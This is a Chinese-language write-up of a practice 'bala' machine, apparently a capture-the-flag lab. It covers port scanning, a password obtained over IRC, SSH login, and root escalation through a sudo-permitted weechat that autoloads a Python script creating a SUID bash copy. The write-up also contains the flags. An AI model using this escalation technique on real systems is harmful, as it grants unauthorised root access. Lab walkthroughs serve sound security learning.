群友靶机 bala

bala

nmap -p- 10.146.254.166 
Host is up (0.0031s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6667/tcp open  irc

80端口是在讲IRC协议的一些基础，Hexchat连接。

_   _                 _____                              
*  | \ | | _____      __ |_   _|__  __ _ _ __ ___   ___ _ __ 
*  |  \| |/ _ \ \ /\ / /   | |/ _ \/ _` | '_ ` _ \ / _ \ '__|
*  | |\  |  __/\ V  V /    | |  __/ (_| | | | | | |  __/ |   
*  |_| \_|\___| \_/\_/     |_|\___|\__,_|_| |_| |_|\___|_|   
*  
*  fzer
*  /msg
* End of message of the day.

和bala聊天，拿到密码ai01ClGAXoYpeevwNMS1，尝试ssh发现不是bala，尝试fzer，成功登录。

 sudo -l
[sudo] password for fzer: 
Matching Defaults entries for fzer on Bala:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fzer may run the following commands on Bala:
    (ALL) PASSWD: /usr/bin/weechat

发现可以免密执行weechat。

发现-d, --dir <path> set WeeChat home directory (default: ~/.weechat)，weechat启动时会自动加载~/.weechat/python/autoload/下所有py脚本，尝试将恶意脚本放入此路径下进行提权。

mkdir -p /home/fzer/getroot/{python/autoload,logs}

提权脚本

import os
os.system('cp /bin/bash /home/fzer/rootbash; chmod +s /home/fzer/rootbash')

sudo weechat --dir /home/fzer/getroot
./rootbash -p
rootbash-5.0# id
uid=1000(fzer) gid=1000(fzer) euid=0(root) egid=0(root) groups=0(root),1000(fzer)
rootbash-5.0# cat /home/fzer/user.txt
flag{user-d3613deb71ef676e8883ffd60450262e}
rootbash-5.0# cat /root/root.txt
flag{root-a73c45107081c08dd4560206b8ef8205}